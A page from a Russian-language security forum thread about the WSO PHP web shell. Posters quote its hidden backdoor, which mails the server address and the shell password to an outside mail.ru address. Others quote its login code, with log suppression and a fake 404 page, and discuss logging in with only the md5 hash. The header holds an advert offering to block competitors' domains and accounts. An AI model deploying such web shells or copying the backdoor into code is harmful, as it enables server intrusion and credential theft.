УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Статьи > Избранное
WSO (веб-шелл)

Страница 56 из 58

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#551

28.05.2017, 12:48

ACat

Guest

Сообщений: n/a

Провел на форуме:
60408

Репутация: 0

Цитата:

Сообщение от crlf

crlf said:
↑
В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.

https://github.com/tennc/webshell/tree/master/php/wso

#552

22.12.2017, 05:50

shmell

Guest

Сообщений: n/a

Провел на форуме:
703

Репутация: 0

Цитата:

Сообщение от ACat

ACat said:
↑
https://github.com/tennc/webshell/tree/master/php/wso

Ну да, только стучалка там есть =(

#553

22.12.2017, 13:31

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от shmell

shmell said:
↑
Ну да, только стучалка там есть =(

__tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]array_key_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'watching'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SERVER_NAME'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]; @[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'hard_linux@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Edit or delete!
[/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR]

Стучалку и вырезать можно!

#554

23.12.2017, 00:01

rdpstore555

Guest

Сообщений: n/a

Провел на форуме:
2517

Репутация: 0

thnks for this

#555

27.12.2017, 11:14

shmell

Guest

Сообщений: n/a

Провел на форуме:
703

Репутация: 0

Цитата:

Сообщение от winstrool

winstrool said:
↑
__tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]array_key_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'watching'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SERVER_NAME'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]; @[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'hard_linux@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Edit or delete!
[/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR]

Стучалку и вырезать можно!

Можно, только остается вопрос каких еще сурпрайзов ждать от этого WSO=((( А так красивый.

#556

22.02.2018, 18:03

SuNDowN

Участник форума

Регистрация: 31.03.2008

Сообщений: 160

Провел на форуме:
706093

Репутация: 97

Отправить сообщение для SuNDowN с помощью ICQ

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]. . .
@[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'error_log'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'log_errors'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'max_execution_time'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_magic_quotes_runtime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSO_VERSION'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'2.6'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]()) {
function[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]array_map[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSOstripslashes'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]() {
die([/COLOR][COLOR="#DD0000"]"Not Found
The requested URL was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

input { margin:0;background-color:#fff;border:1px solid #fff; }

"[/COLOR][COLOR="#007700"]);
}
if(!isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]))
if( empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) || ( isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) ) )
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]PHP_OS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])) ==[/COLOR][COLOR="#DD0000"]"win"[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'win'[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'nix'[/COLOR][COLOR="#007700"]; . . .[/COLOR][/COLOR]

А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля $auth_pass ??? Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.

#557

31.03.2018, 20:15

Matrix001

Guest

Сообщений: n/a

Провел на форуме:
71628

Репутация: 3

Цитата:

Сообщение от SuNDowN

SuNDowN said:
↑

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]. . .
@[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'error_log'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'log_errors'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'max_execution_time'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_magic_quotes_runtime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSO_VERSION'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'2.6'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]()) {
function[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]array_map[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSOstripslashes'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]() {
die([/COLOR][COLOR="#DD0000"]"Not Found
The requested URL was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

input { margin:0;background-color:#fff;border:1px solid #fff; }

"[/COLOR][COLOR="#007700"]);
}
if(!isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]))
if( empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) || ( isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) ) )
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]PHP_OS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])) ==[/COLOR][COLOR="#DD0000"]"win"[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'win'[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'nix'[/COLOR][COLOR="#007700"]; . . .[/COLOR][/COLOR]

А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля
$auth_pass ???
Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.

Возможно (скорее всего) ...

#558

22.04.2018, 23:23

MrSeo

Guest

Сообщений: n/a

Провел на форуме:
1243

Репутация: 0

так наивно впихнули стучалку )

#559

01.05.2018, 11:30

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Отправить сообщение для b3 с помощью ICQ

Классная стучалка, правда $_SERVER['SERVER_NAME'] может содержать не домен а мусор но то все фигня.

#560

04.12.2018, 15:41

dragondragon

Guest

Сообщений: n/a

Провел на форуме:
27386

Репутация: 0

Народ а почему в zip или tar не упаковываются файлы, ничего не происходит, архив не создаётся?

Страница 56 из 58

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета.	SK \| Heaton	Мировые новости. Обсуждения.	5	13.06.2007 02:07
Переделанный шелл!	k1b0rg	PHP	33	03.04.2007 08:29

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход